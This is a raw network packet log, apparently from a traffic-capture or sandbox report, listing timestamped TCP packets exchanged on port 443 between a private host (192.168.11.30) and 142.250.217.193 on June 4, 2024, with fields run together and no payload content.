                                        Jun 4, 2024 14:34:05.161516905 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.161768913 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.161778927 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.162101030 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.170412064 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.170562983 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.170572996 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.170809984 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.179155111 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.179311991 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.179327965 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.179682970 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.188035011 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.188230038 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.188251972 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.188509941 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.196890116 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.197082996 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.197093010 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.197422981 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.205682039 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.205873013 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.230825901 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.231080055 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.231091022 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.231250048 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.234262943 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.234498024 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.234508038 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.234860897 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.241091013 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.241372108 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.241381884 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.241708040 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.247327089 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.247556925 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.247566938 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.247848034 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.253655910 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.253865957 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.253876925 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.254089117 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.259691954 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.259893894 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.259906054 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.260248899 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.265945911 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.266067982 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.266172886 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.266182899 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.266374111 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.266374111 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.272116899 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.272401094 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.272412062 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.272738934 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.278333902 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.278543949 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.278554916 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.278826952 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.284493923 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.284703970 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.284713984 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.284944057 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.290918112 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.291134119 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.291143894 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.291407108 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.296977043 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.297184944 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.297195911 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.297470093 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.303679943 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.304043055 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.306765079 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.307138920 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.307193995 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.307478905 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.312907934 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.313175917 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.313231945 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.313479900 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.319456100 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.319694042 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.319761992 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.320005894 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.325468063 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.326478958 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.326540947 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.327433109 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.331578970 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.331825018 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.331886053 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.332125902 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.337842941 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.338254929 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.338315964 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.338602066 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.343820095 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.344099045 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.344155073 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.344485044 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.349634886 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.349896908 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.349971056 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.350263119 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.350318909 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.350570917 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.355321884 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.355536938 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.355587006 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.355827093 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.361140966 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.361351013 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.361403942 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.361717939 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.366925001 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.367233992 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.367290974 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.367573977 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.370932102 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.371227026 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.371292114 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.371529102 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.382868052 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.383069992 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.383135080 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.383330107 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.383344889 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.383379936 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.383549929 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.383582115 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.383791924 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.384268999 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.384462118 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.384500980 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.384799004 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.388128996 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.388364077 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.388418913 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.388660908 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.391832113 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.392067909 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.392129898 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.392412901 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.395593882 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.395864964 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.395920038 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.396195889 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.399290085 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.399487972 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.399543047 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.399745941 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.402827978 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.403079033 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.403141975 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.403392076 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.406374931 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.406639099 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.406693935 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.406940937 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.409842968 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.410080910 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.410137892 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.410383940 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.413291931 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.414228916 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.414292097 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.414746046 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.416671991 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.416918039 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.416974068 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.417165041 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.419991970 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.420398951 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.421688080 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.421946049 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.422003031 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.422312975 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.425108910 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.425347090 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.425401926 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.425649881 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.428353071 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.428595066 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.428687096 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.428883076 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.431581020 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.431860924 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.431921959 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.432208061 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.434662104 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.434895992 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.434931040 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.435152054 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.437733889 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.438616991 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.438656092 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.438966990 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.440745115 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.440972090 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.441008091 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.441231966 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.443927050 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.444195986 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.444235086 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.444535971 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.447014093 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.447257042 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.447297096 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.447613955 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.450177908 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.451423883 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.451468945 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.451723099 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.452959061 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.453186989 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.453222990 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.453438997 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.456020117 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.456233978 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.456290007 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.456602097 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.458918095 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.459162951 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.460351944 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.460556984 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.460606098 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.460844994 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.463144064 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.463350058 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.463397980 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.463639975 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.466000080 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.466202974 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.466252089 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.466489077 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.468772888 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.468982935 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.469032049 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.469291925 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.471580982 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.471836090 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.471890926 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.472137928 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.474600077 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.474812031 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.474870920 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.475167036 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.477175951 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.477371931 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.477431059 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.477751017 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.479880095 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.480082989 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.480137110 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.480374098 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.482769012 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.483023882 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.483098030 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.483402014 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.485265970 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.485455036 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.485507965 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.485836983 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.487953901 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.488212109 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.488260984 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.488584995 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.490684986 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.490936995 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.490993023 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.491211891 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.493128061 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.493375063 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.494803905 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.495667934 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.495733976 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.496093988 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.497251034 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.497720003 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.497780085 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.498060942 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.500020027 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.500231028 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.500307083 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.500555992 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.500613928 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.500937939 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.502182007 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.502412081 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.502470970 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.502789974 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.504159927 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.504373074 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.504436016 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.504755974 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.506491899 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.506700993 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.506761074 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.506999969 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.514815092 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.515069962 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.515145063 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.515700102 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.516500950 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.516563892 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.516694069 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.517460108 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.517733097 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.517916918 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.517970085 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.518316031 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.519870043 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.520071983 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.520132065 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.520482063 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.520536900 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.520731926 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.522315025 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.522634983 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.522680044 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.522885084 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.524045944 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.524265051 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.524319887 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.524594069 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.526241064 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.526566982 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.527198076 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.527410030 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.527465105 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.527815104 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.529253960 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.530425072 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.530498028 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.531110048 CEST44349793142.250.217.193192.168.11.30
                                        Jun 4, 2024 14:34:05.531549931 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.531549931 CEST49793443192.168.11.30142.250.217.193
                                        Jun 4, 2024 14:34:05.531620979 CEST44349793142.250.217.193192.168.11.30
